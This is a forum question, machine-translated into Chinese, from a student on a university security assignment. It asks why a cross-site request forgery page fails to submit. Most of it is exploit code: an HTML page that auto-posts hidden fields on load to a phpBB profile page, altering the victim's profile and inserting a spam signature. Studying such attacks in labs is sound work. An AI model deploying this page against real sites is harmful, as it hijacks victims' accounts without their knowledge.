0
下面的代碼創建一個POST聲明必須在&結束時提交=「提交」如何解決使用document.createElement(「形式」)之間的衝突。提交和&提交=提交
不幸的是這將創建一個衝突DOM表單對象。
我無權訪問Web應用程序,因爲這是大學安全分配的一部分。我已經能夠通過代理手動編輯數據,並將該元素添加到POST主體,該主體已成功運行,但我希望能夠通過自動代碼完成此操作。
任何幫助將不勝感激。
<html>
<body>
<h1>
This page sends a HTTP POST request onload. </h1>
<script>
function post(url,fields) {
//create a <form> element.
var p = document.createElement('form');
//construct the form
p.action = url;
p.innerHTML = fields;
p.target = '_self';
p.method = 'post';
//append the form to this page
document.body.appendChild(p);
//submit the form
p.submit();
}
function csrf_hack() {
var fields;
// You should replace/augment the following lines with
// your form parameters
fields += "<input type='hidden' name='username' value='bob'>";
fields += "<input type='hidden' name='email' value='[email protected]'>";
fields += "<input type='hidden' name='cur_password' value=''>";
fields += "<input type='hidden' name='new_password' value=''>";
fields += "<input type='hidden' name='password_confirm' value=''>";
fields += "<input type='hidden' name='icq' value=''>";
fields += "<input type='hidden' name='aim' value=''>";
fields += "<input type='hidden' name='msn' value='456'>";
fields += "<input type='hidden' name='yim' value=''>";
fields += "<input type='hidden' name='website' value=''>";
fields += "<input type='hidden' name='location' value=''>";
fields += "<input type='hidden' name='occupation' value=''>";
fields += "<input type='hidden' name='interests' value='Hacking'>";
fields += "<input type='hidden' name='signature' value='Free spicy sauce @ www.getyourfreespicysauce.com'>";
fields += "<input type='hidden' name='viewemail' value='0'>";
fields += "<input type='hidden' name='hideonline' value='0'>";
fields += "<input type='hidden' name='notifyreply' value='0'>";
fields += "<input type='hidden' name='notifypm' value='1'>";
fields += "<input type='hidden' name='popup_pm' value='1'>";
fields += "<input type='hidden' name='attachsig' value='1'>";
fields += "<input type='hidden' name='allowbbcode' value='1'>";
fields += "<input type='hidden' name='allowhtml' value='0'>";
fields += "<input type='hidden' name='allowsmilies' value='1'>";
fields += "<input type='hidden' name='language' value='english'>";
fields += "<input type='hidden' name='style' value='1'>";
fields += "<input type='hidden' name='timezone' value='0'>";
fields += "<input type='hidden' name='dateformat' value='D M d, Y g:ia'>";
fields += "<input type='hidden' name='mode' value='editprofile'>";
fields += "<input type='hidden' name='agreed' value='true'>";
fields += "<input type='hidden' name='coppa' value='0'>";
fields += "<input type='hidden' name='sid' value='341942b39d0e2af257286aabd65b1e31'>";
fields += "<input type='hidden' name='user_id' value='4'>";
fields += "<input type='hidden' name='current_email' value='[email protected]'>";
//this causes p.submit to not be invoked
fields += "<input type='hidden' name='submit' value='Submit'>";
post('http://www.originalphpbb.com/profile.php',fields);
}
window.onload = function() { csrf_hack(); }
</script>
</body></html>
謝謝你的。這完全解決了問題!我已經引用你作爲我的報告的參考。 – SKR